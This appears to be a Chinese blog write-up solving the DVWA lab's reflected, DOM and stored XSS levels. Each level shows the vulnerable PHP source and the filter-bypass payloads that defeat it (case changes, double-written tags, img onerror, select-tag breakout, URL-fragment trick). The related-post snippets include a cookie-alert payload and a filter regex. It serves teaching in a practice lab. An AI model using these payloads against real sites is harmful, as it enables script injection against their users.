安科网

DWVA-XSS部分练手闯关

sswqycbailong

sswqycbailong

2020-01-29

关注 关注

前言

DWVA-XSS部分练手闯关

关于XSS基础内容请查看:https://www.cnblogs.com/xhds/p/12239527.html

实验平台采用DWVA  v1.10

 XSS(Reflected)反射性XSS漏洞

XSS( Reflected)

Vulnerability: Reflected Cross Site Scripting (XSS)

1.low

<?php 
header ("X-XSS-Protection: 0"); 
if( array_key_exists( "name", $_GET ) && $_GET[ ‘name‘ ] != NULL ) { 
    echo ‘<pre>Hello ‘ . $_GET[ ‘name‘ ] . ‘</pre>‘; 
} 
?>

分析代码 不存在任何过滤直接输入:<script>alert("xiaohua2020");</script>

成功弹窗!

DWVA-XSS部分练手闯关

2.medium

<?php 
header ("X-XSS-Protection: 0"); 
if( array_key_exists( "name", $_GET ) && $_GET[ ‘name‘ ] != NULL ) { 
    //这里有个str_replace()函数 匹配<script>如果匹配到则替换成空
    $name = str_replace( ‘<script>‘, ‘‘, $_GET[ ‘name‘ ] ); 
    echo "<pre>Hello ${name}</pre>"; 
} 
?>
看代码前先学一个函数str_replace(find,replace,string,count)返回带有替换值的字符串或数组。
find必需。规定要查找的值。
replace必需。规定替换 find 中的值的值。
string必需。规定被搜索的字符串。
count可选。对替换数进行计数的变量。
那么我们思考过滤了直接输入<script>alert("xiaohua2020");</script> 是不行的 所以思考怎么才能绕过这个过滤1.大小写绕过<Script>alert("xiaohua2020");</script>2.双写绕过<scrip<script>t>alert(/xss/)</script>3.使用别的标签绕过<img src=0 onerror=alert(/xss1/)>

3.high

<?php 

header ("X-XSS-Protection: 0"); 
if( array_key_exists( "name", $_GET ) && $_GET[ ‘name‘ ] != NULL ) { 
    // 注意看这里preg_replace()进行模式匹配过滤
    $name = preg_replace( ‘/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i‘, ‘‘, $_GET[ ‘name‘ ] ); 
    echo "<pre>Hello ${name}</pre>"; 
} 

?>

preg_replace()函数执行一个正则表达式的搜索和替换

利用非script标签绕过

<img src=0 onerror=alert(/xss1/)>

<iframe onload=alert("111")></iframe>

4.impossible

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ ‘name‘ ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ ‘user_token‘ ], $_SESSION[ ‘session_token‘ ], ‘index.php‘ );
    //利用htmlspecialchars()函数进行HTML诗体过滤
    $name = htmlspecialchars( $_GET[ ‘name‘ ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

xss(DOM) dom型XSS

XSS(DOM)

Vulnerability: DOM Based Cross Site Scripting (XSS)

1.LOW

<?php 
header ("X-XSS-Protection: 0"); 
if( array_key_exists( "name", $_GET ) && $_GET[ ‘name‘ ] != NULL ) { 
    echo ‘<pre>Hello ‘ . $_GET[ ‘name‘ ] . ‘</pre>‘; 
} 
?>

不存在任何过滤直接利用!

payload:http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=<script>alert("xiaohua2020");</script>

成功出发弹窗!

DWVA-XSS部分练手闯关

2.medium

<?php

if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ ‘default‘ ]) ) {
    $default = $_GET[‘default‘];
  //这里有个过滤stripos()在$defautl中查找<script如果查找到了执行if里面的内容
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

 这段代码首先4行接收数据到$default中,重点在stripos()这个函数 这个函数在$default中查找<script如果查找到了返回真 真!=false 则执行if里面的内容 否则不执行 我们要想办法使stripos返回真而且我们的恶意代码还能植入进去!

stripos(string,find,start)函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)
string必需。规定要搜索的字符串。
find必需。规定要查找的字符。
start可选。规定开始搜索的位置。
既然过滤了script我们可以用别的标签<img src=0 onerror=alert(/xss1/)>payload:http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=<img src=0 onerror=alert(/xss1/)>然而跟我们的预期不一样没有弹出 我们代码审查下发现我们植入的恶意代码被放在option标签里卖弄的额value里面了所以没有出发 所以我们继续要构造新的语法
构造过程构造语法试了"></option><img src=0 onerror=alert(/xss1/)><option value=" 不行因为泵在select标签里面执行所以我们要重新构造跳出select标签"></option></select><img src=0 onerror=alert(/xss1/)><select><option value="payload:http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default="></option></select><img src=0 onerror=alert(/xss1/)><select><option value="成功弹出弹窗!

 3.high

<?php 
// Is there any input? 
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ ‘default‘ ]) ) { 
    # White list the allowable languages 
    switch ($_GET[‘default‘]) { 
        case "French": 
        case "English": 
        case "German": 
        case "Spanish": 
            # ok 
            break; 
        default: 
            header ("location: ?default=English"); 
            exit; 
    } 
} 

?>

 这里设置了白名单过滤仅让case里面的内容通过

我们可以利用#绕过url中有一个字符为# #在php中为注释字符所以注释后面的数据不会发送给服务器端,从而绕过服务端过滤构造语法未为:

#"></option></select><img src=0 onerror=alert(/xss1/)><select><option value="

payload:http://101.201.65.164/DVWA/vulnerabilities/xss_d/?default=French#"></option></select><img src=0 onerror=alert(/xss1/)><select><option value="

成功弹窗!

DWVA-XSS部分练手闯关

  3.impossible

<?php

# Don‘t need to do anything, protction handled on the client side#后端不要做任何事保持在客户端处理即可

?>

xss(Stored)存储型XSS漏洞

xss(Stored)

Vulnerability: Stored Cross Site Scripting (XSS)

1.LOW

<?php 

if( isset( $_POST[ ‘btnSign‘ ] ) ) { 
    // Get input 
    $message = trim( $_POST[ ‘mtxMessage‘ ] ); 
    $name    = trim( $_POST[ ‘txtName‘ ] ); 

    // stripslashes()删除$message中的反斜杠
    $message = stripslashes( $message ); 
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Sanitize name input 
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Update database 
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( ‘$message‘, ‘$name‘ );"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( ‘<pre>‘ . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>‘ );

    //mysql_close(); 
} 

?>

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。

输入 <script>alert("xiaohua2020");</script>

 成功弹窗!

DWVA-XSS部分练手闯关

DWVA-XSS部分练手闯关

2.Medium

<?php 
if( isset( $_POST[ ‘btnSign‘ ] ) ) { 
    // Get input 
    $message = trim( $_POST[ ‘mtxMessage‘ ] ); 
    $name    = trim( $_POST[ ‘txtName‘ ] ); 

    // addslashes()函数为预定义符号加斜杠  strip_tages()剥取html、PHP等标签
    $message = strip_tags( addslashes( $message ) ); 
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
    $message = htmlspecialchars( $message ); 

    // Sanitize name input 
    $name = str_replace( ‘<script>‘, ‘‘, $name ); 
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Update database 
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( ‘$message‘, ‘$name‘ );"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( ‘<pre>‘ . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>‘ );

    //mysql_close(); 
} 

?>

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

str_replace() 函数以其他字符替换字符串中的一些字符(区分大小写)。

看到$message被多次过滤而$name值未过滤我们可以通过$name传递,前端限制了$name长度我们可以通过审查元素增加它的长度

提交得到弹窗!

DWVA-XSS部分练手闯关

3.high

<?php 

if( isset( $_POST[ ‘btnSign‘ ] ) ) { 
    // Get input 
    $message = trim( $_POST[ ‘mtxMessage‘ ] ); 
    $name    = trim( $_POST[ ‘txtName‘ ] ); 

    //
    //strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。
    //addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
    $message = strip_tags( addslashes( $message ) ); 
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
   //htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。   $message = htmlspecialchars( $message ); 

    // preg_replace()过滤
    $name = preg_replace( ‘/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i‘, ‘‘, $name ); 
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Update database 
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( ‘$message‘, ‘$name‘ );"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( ‘<pre>‘ . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>‘ );

    //mysql_close(); 
} 

?>

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。

上面三个函数都是对$messag进行过滤

preg_replace()正则匹配对$name进行过滤 所以我们想办法绕过$name这边的过滤就OK

3.impossible

<?php

if( isset( $_POST[ ‘btnSign‘ ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ ‘user_token‘ ], $_SESSION[ ‘session_token‘ ], ‘index.php‘ );

    // Get input
    $message = trim( $_POST[ ‘mtxMessage‘ ] );
    $name    = trim( $_POST[ ‘txtName‘ ] );

    // message部分输入经过stripslashes()删除反斜杠 htmlspecialchars()html实体两大过滤
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // name部分也经过strpslashes()htmlspecialchars()两大过滤
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( ‘INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );‘ );
    $data->bindParam( ‘:message‘, $message, PDO::PARAM_STR );
    $data->bindParam( ‘:name‘, $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

推荐优秀的类似文章

新手科普 | 通过DVWA学习XSS(盗取cookie)

https://www.freebuf.com/articles/web/157953.html

xss alert

sswqycbailong

sswqycbailong

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

xss(跨站脚本攻击)

  xss造成的原因是因为对用户插入的数据没有进行过滤,导致用户可以上传一些非法数据,对服务器数据进行盗取。  xss的形成一定是伴随着输入和输出的。

sswqycbailong 2020-06-01

test

基本WAF都针对常用的弹窗函数做了拦截,如alert()、prompt()、confirm(),另外还有代码执行函数eval(),想要绕过去也比较简单,我们以alert为例,其实只需要分割alert和()即可,例如:。添加空格、TAB、回车、换行:aler

码农成长记 2020-04-19

常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御

而以分号字元为不同命 令的区别。等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查询来设计数据 访问功能。4).其他,使用其他更安全的方式连接SQL数据

sunlizhen 2020-04-10

XSS跨站测试代码

‘><script>alert(document.cookie)</script>=‘><script>alert(document.cookie)</script><script>a

xiaof 2020-02-17

防XSS攻击过滤器

private const string strRegex = @"<[^>]+?style=[\w]+?:expression\(|\b(alert|confirm|prompt)\b|^\+/v(8|9)|<[^>]*

sswqycbailong 2020-07-28

xss防范小知识

在Web安全中,xss攻击绝对算是一种非常常见的攻击方式了,它能够窃取用户的隐私信息,比如cookie,也能够做一些非用户意图的操作来达到攻击目的。xss攻击是一种非法脚本的插入与执行攻击,全称为 cross site script ,即跨站脚本攻击。通常

csxiaoqiang 2020-07-26

xss.haozi.me 练习

先打算从比较方便的可以在线的练习开始,所以并没有用最常用的DVWA,而就直接用的在线的这个xss靶场开始。服务端仍然没有进行过滤,只是这次的输出并不是直接输出,而是加入在textarea中,所以现将其闭合在输出即可。对于<textarea>标签

码农成长记 2020-07-19

极致CMS两处漏洞复现/存储xss/文件上传Getshell

根据一路追踪发现目录A是网站目录的后台文件,后端文件审计没问题来看看前端文件tql代码审计发现是问题出现在前端文件article-list.html内的问题191行这里这里没有实体化编码导致的后台存储xss漏洞输出函数未经过滤没有实体化编码。{field:

layloge 2020-07-05

百度编辑器(ueditor)踩坑,图片转存无法使用

在使用 百度编辑器 的过程中碰到了一些问题,图片转存功能无法使用, 即便是疯狂地在官方 Demo、文档、论坛甚至是 GitHub 上也没找到理想的答案。问题描述默认情况下,从 Word 中复制的内容粘贴在编辑器时,图片不会自动上传保存,除非单独复制粘贴图片

layloge 2020-06-26

Web前端必备基础知识点分享

今天跟新手朋友们分享Web前端必备基础知识点,希望对你们有所帮助!一来可以提高后端处理的效率,二来可以提高后端数据的安全。后端不要动态sql语句,使用存储过程查询语句。限制用户访问数据库权限。后端如果出现异常的话,要使用自定义错误页,防止用户通过服务器默认

liangjielaoshi 2020-06-25

java 拦截器解决xss攻击

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者

csxiaoqiang 2020-06-16

XSS BOT编写

而它支持chrome webdriver、firefox webdirver、PhantomJS等,但是呢前2个就需要有桌面,而我们的docker环境是没有桌面的,所以就只能选择PhantomJS了。$sql = "SELECT password

某先生 2020-06-13

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringBuffer sql = new StringBuffer("select key_sn,remark,create_date from tb_selogon_key where 1=1 "); if(!

ItBJLan 2020-06-11

了解 OWASP TOP 10

输入时将一些包含指令的数据发送给解析器,解释器当成命令执行。xss会执行攻击者在浏览器中执行的脚本,并劫持用户会话,破坏网站或用户重定向到恶意站点,使用xss还可以执行拒绝服务攻击。同时,使用这些组件会破坏应用程序防御,造成各种攻击产生严重的后果。

layloge 2020-06-07

XSS漏洞的基本原理

XSS,跨站脚本攻击。它指的是恶意攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当用户浏览该页之时,嵌入其中Web里面的恶意代码会被执行,从而对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。反射型XSS也被称为非持久性XSS,攻击

csxiaoqiang 2020-06-03

XSS Challenges 记录与反思

XSS Challenges是出自某位日本大佬之手,一共十九关。我没有完全记录下来,前八关基本上不怎么需要思考就能做出来的,方法也不止一种。第九关是利用UTF-7并且对ie版本号有要求也不具体操作了,网上有很多关于这个挑战的教程,想了解的可以多看看。也是需

layloge 2020-05-30

XSS跨站脚本攻击

XSS全称跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在

码农成长记 2020-05-28

C# 防XSS攻击 示例

字符串:<script></script><style>alert</style><h1>111</h1><h2>222</h2>drop delete <

qidu 2020-05-26

20175110 王礼博 Exp 9 Web安全基础

具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。与XSS攻击相比,CSRF攻击往往不大流行和难以

zhuangnet 2020-05-20

2019-2020-2 20175313 张黎仙《网络对抗技术》Exp 8 Web基础

掌握Web前端、Web后端相关语法基础以及编写出用户能登陆,登陆用户名密码保存在数据库中,登陆成功显示欢迎页面的代码。通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。跨站脚本攻击,为不和层叠样式

zhuangnet 2020-05-19
sswqycbailong

sswqycbailong

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号